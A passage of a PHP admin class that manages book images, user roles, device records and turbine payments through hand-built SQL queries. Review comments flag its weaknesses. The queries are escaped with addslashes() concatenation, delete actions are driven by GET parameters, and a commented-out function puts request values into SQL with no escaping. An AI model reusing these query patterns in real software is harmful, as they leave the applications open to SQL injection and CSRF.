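    $esc[$field] = (isset($objarray[$field]) && is_scalar($objarray[$field])) ? addslashes($objarray[$field]) : '';
   }
   $SelQueryx = 'SELECT * FROM `images` WHERE `isbn` = "'.$esc['isbn'].'" AND `m_type` = "'.$esc['m_type'].'" AND `m_cat` = "'.$esc['m_cat'].'" Limit 0,1';
   $DevDetail = $this->ExecuteQuery($SelQueryx, 'select');

   return !(!empty($DevDetail) && is_array($DevDetail));
  }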
 
 
 /* Delete the Static Page */

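 /**
  * Delete `images` rows whose `m_name` equals the value of a query parameter.
  *
  * @param string $id Name of the $_GET parameter that holds the material name.
  */
 function DeleteID($id){
  global $objSmarty;
  // Without a value, do nothing: the original would have deleted every row
  // with an empty `m_name`.
  if(!isset($_GET[$id]) || !is_string($_GET[$id]) || $_GET[$id] === ''){
   return;
  }
  // NOTE(review): this is a destructive action driven by a GET parameter;
  // confirm the caller enforces authentication and a CSRF check.
  $DelQuery3 = 'DELETE FROM `images`  WHERE `m_name`="'.addslashes($_GET[$id]).'"';
  $this->ExecuteQuery($DelQuery3, 'delete');
  $objSmarty->assign('SuccessMessage1', 'Deleted Successfully');
 }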
 
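  /**
   * Load the role names mapped to the current session's user group and
   * publish them to Smarty as `RList`.
   *
   * @return array|null The role rows, or null when none were found.
   */
  function RoleList(){
   global $objSmarty;
   // The group name lives in the session, but escape it anyway so a stored
   // value containing quotes cannot alter the statement.
   $group = (isset($_SESSION['USER_GROUP']) && is_scalar($_SESSION['USER_GROUP'])) ? addslashes($_SESSION['USER_GROUP']) : '';
   $SelQuery1 = 'SELECT role_name FROM arka_group_mapping WHERE `group_name` = "'.$group.'" ORDER BY sl_no';
   $RL = $this->ExecuteQuery($SelQuery1, "select");

   if(empty($RL) || !is_array($RL)){
    return;
   }

   // The original returned from inside the loop, so only the first row was
   // unescaped. Process every row, then assign and return once.
   foreach($RL as $key=>$value){
    if(isset($value['role_id'])){
     $RL[$key]['role_id'] = stripslashes($value['role_id']);
    }
    $RL[$key]['role_name'] = stripslashes($value['role_name']);
   }
   $objSmarty->assign('RList', $RL);
   return $RL;
  }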


 /* Activate, Deactivate and Delete for the Static Pages */
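 /**
  * Delete, activate or deactivate the selected `arka_device_reg_master` rows.
  *
  * @param array $objArray Posted form: `ConId` (list of row ids) and `Submit`
  *                        ('Delete', 'Active' or 'InActive').
  */
 function ActiveContent($objArray){
  global $objSmarty;

  // The ids are placed unquoted inside IN (...), so each one is forced to a
  // positive integer; anything else is discarded.
  $ids = array();
  if(!empty($objArray['ConId']) && is_array($objArray['ConId'])){
   foreach($objArray['ConId'] as $rawId){
    $id = is_scalar($rawId) ? (int)$rawId : 0;
    if($id > 0){
     $ids[] = $id;
    }
   }
  }
  if(empty($ids)){
   $objSmarty->assign('ErrorMessage', 'No Content Selected');
   return;
  }

  $BanIds = implode(',', $ids);
  $action = isset($objArray['Submit']) ? $objArray['Submit'] : '';
  switch($action){
   case 'Delete':
    $DelQuery = 'DELETE FROM `arka_device_reg_master` WHERE `id` IN ( '.$BanIds.' )';
    $this->ExecuteQuery($DelQuery, 'delete');
    $objSmarty->assign('SuccessMessage', 'Deleted Successfully');
    break;
   case 'Active':
    $UpQuery = 'UPDATE `arka_device_reg_master` SET `status` =1 WHERE `id` IN (' . $BanIds . ')';
    $this->ExecuteQuery($UpQuery, 'update');
    $objSmarty->assign('SuccessMessage', 'The Contents Activated Successfully');
    break;
   case 'InActive':
    $UpQuery = 'UPDATE `arka_device_reg_master` SET `status` =0 WHERE `id` IN (' . $BanIds . ')';
    $this->ExecuteQuery($UpQuery, 'update');
    $objSmarty->assign('SuccessMessage', 'The Contents In-Activated Successfully');
    break;
  }
 }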
 
 /**
  * Fetch the `recommended_books` rows with status "1", ordered by `s_no`
  * descending, and hand them to the template as `PageList`.
  *
  * @param mixed $objArray Not used by this method.
  * @return void
  */
 function GetBookList($objArray='')
 {
  global $objSmarty;

  // Fixed query text: no caller-supplied value is interpolated here.
  $rows = $this->ExecuteQuery(
   'SELECT * FROM `recommended_books` WHERE status="1" ORDER BY s_no DESC',
   "select"
  );
  $objSmarty->assign('PageList', $rows);
 }
	//Delete Plan List
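 /**
  * Soft-delete recommended books by setting `status` to "0" on the rows whose
  * `image` equals $_GET['image'], then redirect back with a success message.
  *
  * @return void
  */
 function DeleteBookList(){
  // The value comes from the query string: coerce it to a string (array-valued
  // parameters become '') and escape it before building the statement.
  // NOTE(review): addslashes() mirrors the escaping used elsewhere in this class
  // but is not charset-aware; prefer bound parameters if MysqlFns supports them.
  $image = (isset($_GET['image']) && is_string($_GET['image'])) ? addslashes($_GET['image']) : '';

  $SelQuery = 'UPDATE `recommended_books` set status = "0" WHERE image = "'.$image.'" ';
  $this->ExecuteQuery($SelQuery, "update");

  $url_addtnal_data=base64_encode("Recommended Book Deleted Successfully");
  // NOTE(review): PHP_SELF reflects the requested path, including any trailing
  // path info, so SCRIPT_NAME is the usual safer choice for a self-redirect.
  // Nothing stops execution after the header, so the caller keeps running.
  header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data);
 }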
  /* Pay Turbine Amount, Payment status for the Static Pages */
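 /**
  * Record payments against the selected devices and the owning customer.
  *
  * Every id in $objArray['ConId'] is first checked: the amount stored under
  * $objArray[<id>] must not exceed that device's `amt_due`. When all pass, the
  * device rows and the customer row are updated and one row is inserted into
  * `arka_dev_payment_master`.
  *
  * @param array $objArray Presumably the submitted form: 'ConId' (device ids),
  *                        one amount per device-id key, plus 'up_date', 'up_time',
  *                        'cusid', 'total', 'amt_due', 'inv_no', 'inv_date',
  *                        'p_ref_no', 'mode', 'pay_to' and 'p_amt'.
  * @return false|null false when an amount exceeds the amount due, otherwise null.
  */
 function TurbinePayments($objArray){
  global $objSmarty;

  if(empty($objArray['ConId']) || !is_array($objArray['ConId'])){
   $objSmarty->assign('ErrorMessage', 'No Turbine Selected');
   return;
  }

  // Pass 1: reject the whole request before anything is written.
  // NOTE(review): only the upper bound is checked; the amount is not validated
  // as a non-negative number here - confirm the caller does so.
  foreach ($objArray['ConId'] as $DevIds){
   // Device ids are escaped like the other fields below before they are
   // embedded in SQL text.
   $SelQuery4 = 'SELECT * FROM `arka_dev_payment_details` WHERE device_id = "'.addslashes($DevIds).'" Limit 0,1';
   $PayDetails = $this->ExecuteQuery($SelQuery4, 'select');
   $d_amt_due = stripslashes($PayDetails[0]['amt_due']);
   $requested = isset($objArray[$DevIds]) ? $objArray[$DevIds] : null;
   if($requested>$d_amt_due){
    $objSmarty->assign('ErrorMessage', 'Payment Should be Less than Amount Due');
    return false;
   }
  }

  // Pass 2: apply each payment to its device row.
  // NOTE(review): the statements below are not wrapped in a transaction, so a
  // failure part-way through leaves earlier updates in place.
  $p_status = null; // stays null when no device id is truthy
  foreach ($objArray['ConId'] as $DevIds){
   if($DevIds)
   {
    $safeDevId = addslashes($DevIds);
    $d_pay_amnt = isset($objArray[$DevIds]) ? $objArray[$DevIds] : null;

    $SelQuery4 = 'SELECT * FROM `arka_dev_payment_details` WHERE device_id = "'.$safeDevId.'" Limit 0,1';
    $PayDetails = $this->ExecuteQuery($SelQuery4, 'select');
    $d_amt_due = stripslashes($PayDetails[0]['amt_due']);
    $d_p_amt = stripslashes($PayDetails[0]['d_payment_amt']);

    $p_am_due = $d_amt_due-$d_pay_amnt;   // remaining balance
    $d_p_amt = $d_p_amt + $d_pay_amnt;    // running total paid
    if($p_am_due==0)
     $p_status ="Paid";
    else
     $p_status ="Pending";

    // Previously assigned the undefined $d_p_amn, so the template got null.
    $objSmarty->assign('d_p_amt', $d_p_amt);
    $objSmarty->assign('p_am_due', $p_am_due);
    $objSmarty->assign('p_status', $p_status);

    $UpQuery = 'UPDATE `arka_dev_payment_details` SET `d_payment_amt` = "'.$d_p_amt.'",`payment_date` = "'.trim(addslashes($objArray['up_date'])).'",`payment_time` = "'.trim(addslashes($objArray['up_time'])).'",`d_payment_status` = "'.$p_status.'",`amt_due` = "'.$p_am_due.'" WHERE `device_id` ="'.$safeDevId.'"' ;
    $this->ExecuteQuery($UpQuery, 'update');
   }
  }

  // Customer-level totals.
  // NOTE(review): 'total', 'amt_due' and 'p_amt' are written as received rather
  // than recomputed from the device rows; confirm that is intended.
  $SelQuery5 = 'SELECT * FROM `arka_cus_payment_details` WHERE customer_id = "'.trim(addslashes($objArray['cusid'])).'" Limit 0,1';
  $PayDetails = $this->ExecuteQuery($SelQuery5, 'select');

  // Status is derived from the stored total due, read before the update below.
  $tot_amt_due = stripslashes($PayDetails[0]['tot_amt_due']);
  if($tot_amt_due==0)
   $tot_status ="Paid";
  else
   $tot_status ="Pending";
  $objSmarty->assign('p_status', $p_status);

  $UpQuery1 = 'UPDATE `arka_cus_payment_details` SET `total_amt` = "'.trim(addslashes($objArray['total'])).'",`tot_amt_due` = "'.trim(addslashes($objArray['amt_due'])).'",`payment_status` = "'.$tot_status.'" WHERE `customer_id` ="'.trim(addslashes($objArray['cusid'])).'"' ;
  $this->ExecuteQuery($UpQuery1, 'update');

  $InsQuery3 = 'INSERT INTO `arka_dev_payment_master`(`invoice_no`, `invoice_date`, `pay_ref_no`, `pay_mode`, `pay_to`, `payment_amt`, `payment_due`, `payment_status`) VALUES("'.trim(addslashes($objArray['inv_no'])).'","'.trim(addslashes($objArray['inv_date'])).'","'.trim(addslashes($objArray['p_ref_no'])).'","'.trim(addslashes($objArray['mode'])).'","'.trim(addslashes($objArray['pay_to'])).'","'.trim(addslashes($objArray['p_amt'])).'","'.trim(addslashes($objArray['amt_due'])).'","'.$tot_status.'")';
  $this->ExecuteQuery($InsQuery3, 'insert');

  $objSmarty->assign('SuccessMessage', 'Payment Transcation Successfully Completed');
 }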
 	
	
	
	 /* Delete the Static Page */
/* function DeleteID2($deleid){
  global $objSmarty;
  $DelQuery = 'UPDATE `images` set status ="0" WHERE `isbn`="'.$_REQUEST['deleid'].'"';
 // echo($DelQuery);
  $this->ExecuteQuery($DelQuery, 'delete');
   $InsQuery4 = 'INSERT INTO `arka_deleted_records`(`deleted_data`, `deleted_table`, `deleted_by`) VALUES("'.$_REQUEST['deleid'].'","tasca_material_reg_master","'.$_SESSION['UserName'].'")';
	 $this->ExecuteQuery($InsQuery4, 'insert');
  $objSmarty->assign('SuccessMessage', 'Deleted Successfully');
  $this->GetMaterialLists();
 }*/
	
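/**
 * Soft-delete `images` rows by setting `status` to "0" where `m_name` equals
 * $_GET['book_name'], then redirect back to the current script.
 *
 * @param mixed $id Not used; the value is read from $_GET['book_name'].
 * @return void
 */
function DeleteID2($id){
  // The value comes from the query string: coerce it to a string (array-valued
  // parameters become '') and escape it before building the statement.
  // NOTE(review): addslashes() mirrors the escaping used elsewhere in this class
  // but is not charset-aware; prefer bound parameters if MysqlFns supports them.
  $bookName = (isset($_GET['book_name']) && is_string($_GET['book_name'])) ? addslashes($_GET['book_name']) : '';

  // The statement used to be echoed here, which exposed the SQL text to the
  // browser and sent output before header(), breaking the redirect unless
  // output buffering was enabled.
  $DelQuery2 = 'update `images` set status ="0" WHERE `m_name`="'.$bookName.'" ';
  // The query type is passed as 'delete' although the statement is an UPDATE;
  // kept as-is because ExecuteQuery's handling of the type is not visible here.
  $this->ExecuteQuery($DelQuery2, 'delete');
  header('Location:' .$_SERVER['PHP_SELF'].'?server_success1=delete succeed');
}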
}
?>


